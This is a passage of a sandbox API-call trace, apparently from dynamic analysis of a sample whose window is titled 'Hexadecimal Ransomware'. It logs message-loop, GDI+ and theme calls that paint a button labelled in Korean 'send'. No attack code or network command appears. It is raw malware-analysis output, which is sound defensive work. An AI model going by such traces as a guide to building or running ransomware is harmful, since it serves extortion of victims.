lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.342] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.342] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.342] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.342] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.342] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.342] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.342] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.342] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.343] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.343] WaitMessage () returned 1 [0265.504] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.505] IsWindowUnicode (hWnd=0x102ea) returned 1 [0265.505] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.505] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.505] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.505] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.505] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.505] WaitMessage () returned 1 [0270.188] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.189] IsWindowUnicode (hWnd=0x102d8) returned 1 [0270.189] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.190] GetKeyState (nVirtKey=16) returned 0 [0270.190] GetKeyState (nVirtKey=17) returned 0 [0270.190] GetKeyState (nVirtKey=18) returned -127 [0270.190] SendMessageW (hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0270.190] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x1 [0270.190] GetKeyState (nVirtKey=16) returned 0 [0270.190] GetKeyState (nVirtKey=17) returned 0 [0270.190] GetKeyState (nVirtKey=18) returned -127 [0270.191] TranslateMessage (lpMsg=0x11fed00) returned 1 [0270.191] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.191] GetKeyState (nVirtKey=16) returned 0 [0270.191] GetKeyState (nVirtKey=17) returned 0 [0270.191] GetKeyState (nVirtKey=18) returned -127 [0270.191] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x104, wParam=0x12, lParam=0x20380001) returned 0x0 [0270.192] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.192] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.192] WaitMessage () returned 1 [0270.198] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.198] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0270.219] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.222] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0270.222] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0270.222] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0270.222] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0270.228] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0270.231] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0270.232] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0270.232] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0270.232] GetCapture () returned 0x0 [0270.232] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0270.233] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0270.233] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0270.233] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0270.234] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.234] IsWindowUnicode (hWnd=0x202e6) returned 1 [0270.234] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.234] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.234] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.234] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.235] IsWindowUnicode (hWnd=0x102d8) returned 1 [0270.235] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.235] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.235] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.235] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0xf0105ee [0270.236] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0270.236] CreateCompatibleDC (hdc=0xf0105ee) returned 0xd010801 [0270.236] SelectObject (hdc=0xd010801, h=0xb050815) returned 0x85000f [0270.236] GdipCreateFromHDC (hdc=0xd010801, graphics=0x11fe760) returned 0x0 [0270.236] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0270.236] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0270.236] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0270.236] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0270.236] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0270.236] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0270.236] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ed8) returned 0x0 [0270.236] LocalFree (hMem=0x1593ed8) returned 0x0 [0270.237] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0270.237] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0270.237] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0270.237] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0270.237] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0270.237] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd810dbd) returned 0x0 [0270.237] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0270.237] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0270.237] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.237] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.237] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.237] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.237] SaveDC (hdc=0xd010801) returned 1 [0270.237] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.237] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.237] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.237] GetNearestColor (hdc=0xd010801, color=0x989898) returned 0x989898 [0270.237] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.238] GetNearestColor (hdc=0xd010801, color=0x7f7f7f) returned 0x7f7f7f [0270.238] GetNearestColor (hdc=0xd010801, color=0x989898) returned 0x989898 [0270.238] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.238] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.238] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.238] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.238] IsAppThemed () returned 0x1 [0270.238] GetThemeAppProperties () returned 0x3 [0270.238] GetThemeAppProperties () returned 0x3 [0270.238] IsAppThemed () returned 0x1 [0270.238] GetThemeAppProperties () returned 0x3 [0270.238] GetThemeAppProperties () returned 0x3 [0270.238] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x3359e38 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0270.246] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetFocus () returned 0x0 [0270.247] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] IsThemePartDefined () returned 0x1 [0270.247] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0270.247] IsAppThemed () returned 0x1 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] GetThemeAppProperties () returned 0x3 [0270.247] IsAppThemed () returned 0x1 [0270.248] GetThemeAppProperties () returned 0x3 [0270.248] GetThemeAppProperties () returned 0x3 [0270.248] IsThemePartDefined () returned 0x1 [0270.248] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0270.248] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0270.248] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0270.248] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0270.248] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0270.248] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0270.248] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0270.248] LocalFree (hMem=0x1593ed8) returned 0x0 [0270.248] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0270.248] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0270.248] LocalFree (hMem=0x1593ae8) returned 0x0 [0270.248] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0270.248] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0270.248] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0270.248] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0270.248] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0270.248] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0270.248] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.249] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.249] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.249] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.249] SaveDC (hdc=0xd010801) returned 1 [0270.249] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50040825 [0270.249] GetClipRgn (hdc=0xd010801, hrgn=0x50040825) returned 0 [0270.249] SelectClipRgn (hdc=0xd010801, hrgn=0x4004081c) returned 2 [0270.249] DeleteObject (ho=0x50040825) returned 1 [0270.249] DeleteObject (ho=0x4004081c) returned 1 [0270.249] OffsetViewportOrgEx (in: hdc=0xd010801, x=0, y=0, lppt=0x335a4e8 | out: lppt=0x335a4e8) returned 1 [0270.249] DrawThemeParentBackground () returned 0x0 [0270.249] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0270.249] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0270.249] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0270.249] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0270.249] GetSystemMetrics (nIndex=42) returned 0 [0270.250] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0270.250] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0270.250] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0270.250] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.250] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.250] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.250] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.250] SaveDC (hdc=0xd010801) returned 2 [0270.250] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.250] CreateSolidBrush (color=0x0) returned 0x2f100826 [0270.250] FillRect (hDC=0xd010801, lprc=0x11fdf30, hbr=0x2f100826) returned 1 [0270.250] DeleteObject (ho=0x2f100826) returned 1 [0270.251] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.251] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0270.251] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0270.251] GetSystemMetrics (nIndex=42) returned 0 [0270.251] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0270.251] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0270.251] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0270.251] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.251] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.251] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.251] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.251] SaveDC (hdc=0xd010801) returned 2 [0270.251] GetNearestColor (hdc=0xd010801, color=0x0) returned 0x0 [0270.251] CreateSolidBrush (color=0x0) returned 0x30100826 [0270.251] FillRect (hDC=0xd010801, lprc=0x11fded0, hbr=0x30100826) returned 1 [0270.251] DeleteObject (ho=0x30100826) returned 1 [0270.251] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.251] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0270.251] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0270.252] GetSystemMetrics (nIndex=42) returned 0 [0270.252] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0270.252] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0270.252] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.252] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.252] IsAppThemed () returned 0x1 [0270.252] GetThemeAppProperties () returned 0x3 [0270.252] GetThemeAppProperties () returned 0x3 [0270.252] IsAppThemed () returned 0x1 [0270.252] GetThemeAppProperties () returned 0x3 [0270.252] GetThemeAppProperties () returned 0x3 [0270.252] IsThemePartDefined () returned 0x1 [0270.252] GdipCreateRegion (region=0x11fe454) returned 0x0 [0270.252] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0270.252] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0270.252] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0270.253] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0270.253] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0270.253] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0270.253] LocalFree (hMem=0x1593ea0) returned 0x0 [0270.253] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0270.253] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0270.253] LocalFree (hMem=0x1593ea0) returned 0x0 [0270.253] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0270.253] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0270.253] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0270.253] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0270.253] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0270.253] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0270.253] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.253] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.253] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.254] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.254] SaveDC (hdc=0xd010801) returned 1 [0270.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4104081c [0270.254] GetClipRgn (hdc=0xd010801, hrgn=0x4104081c) returned 0 [0270.254] SelectClipRgn (hdc=0xd010801, hrgn=0x52040825) returned 2 [0270.254] DeleteObject (ho=0x4104081c) returned 1 [0270.254] DeleteObject (ho=0x52040825) returned 1 [0270.254] OffsetViewportOrgEx (in: hdc=0xd010801, x=0, y=0, lppt=0x335aea8 | out: lppt=0x335aea8) returned 1 [0270.254] IsAppThemed () returned 0x1 [0270.254] GetThemeAppProperties () returned 0x3 [0270.254] GetThemeAppProperties () returned 0x3 [0270.254] DrawThemeBackground () returned 0x0 [0270.255] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.255] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.255] GdipCreateRegion (region=0x11fe458) returned 0x0 [0270.255] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0270.255] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0270.255] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0270.255] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0270.255] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0270.255] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0270.255] LocalFree (hMem=0x1593ae8) returned 0x0 [0270.255] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0270.255] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0270.257] LocalFree (hMem=0x1593ea0) returned 0x0 [0270.257] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0270.257] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0270.257] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0270.257] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0270.257] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0270.257] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0270.257] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.257] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.257] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.257] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.257] SaveDC (hdc=0xd010801) returned 1 [0270.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x53040825 [0270.258] GetClipRgn (hdc=0xd010801, hrgn=0x53040825) returned 0 [0270.258] SelectClipRgn (hdc=0xd010801, hrgn=0x4204081c) returned 2 [0270.258] DeleteObject (ho=0x53040825) returned 1 [0270.258] DeleteObject (ho=0x4204081c) returned 1 [0270.258] OffsetViewportOrgEx (in: hdc=0xd010801, x=0, y=0, lppt=0x335b17c | out: lppt=0x335b17c) returned 1 [0270.258] IsAppThemed () returned 0x1 [0270.258] GetThemeAppProperties () returned 0x3 [0270.258] GetThemeAppProperties () returned 0x3 [0270.258] GetThemeBackgroundContentRect () returned 0x0 [0270.258] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.258] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.258] IsAppThemed () returned 0x1 [0270.258] GetThemeAppProperties () returned 0x3 [0270.258] GetThemeAppProperties () returned 0x3 [0270.258] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0270.258] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0270.258] GetCurrentObject (hdc=0xd010801, type=0x1) returned 0xb00017 [0270.258] GetCurrentObject (hdc=0xd010801, type=0x2) returned 0x900010 [0270.258] GetCurrentObject (hdc=0xd010801, type=0x7) returned 0xb050815 [0270.258] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.259] SaveDC (hdc=0xd010801) returned 1 [0270.259] GetTextAlign (hdc=0xd010801) returned 0x0 [0270.259] GetTextColor (hdc=0xd010801) returned 0x0 [0270.259] GetCurrentObject (hdc=0xd010801, type=0x6) returned 0x8a01c2 [0270.259] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0270.259] SelectObject (hdc=0xd010801, h=0x170a07ff) returned 0x8a01c2 [0270.259] GetBkMode (hdc=0xd010801) returned 2 [0270.259] SetBkMode (hdc=0xd010801, mode=1) returned 2 [0270.259] DrawTextExW (in: hdc=0xd010801, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x335b51c | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0270.260] DrawTextExW (in: hdc=0xd010801, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x335b51c | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0270.262] RestoreDC (hdc=0xd010801, nSavedDC=-1) returned 1 [0270.262] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.262] GetFocus () returned 0x0 [0270.262] IsAppThemed () returned 0x1 [0270.262] GetThemeAppProperties () returned 0x3 [0270.262] GetThemeAppProperties () returned 0x3 [0270.262] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0270.262] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=64, cy=25, hdcSrc=0xd010801, x1=0, y1=0, rop=0xcc0020) returned 1 [0270.262] GdipReleaseDC (graphics=0x6e19d80, hdc=0xd010801) returned 0x0 [0270.262] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0270.262] SelectObject (hdc=0xd010801, h=0x85000f) returned 0xb050815 [0270.262] DeleteDC (hdc=0xd010801) returned 1 [0270.262] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0270.262] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0270.263] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.263] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.263] WaitMessage () returned 1 [0270.266] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.266] IsWindowUnicode (hWnd=0x202e6) returned 1 [0270.267] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.267] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.267] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.267] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.267] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.268] WaitMessage () returned 1 [0270.306] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.306] IsWindowUnicode (hWnd=0x202e6) returned 1 [0270.306] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.306] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.306] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.308] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.308] IsWindowUnicode (hWnd=0x202e6) returned 1 [0270.308] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.308] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.308] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.308] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.308] IsWindowUnicode 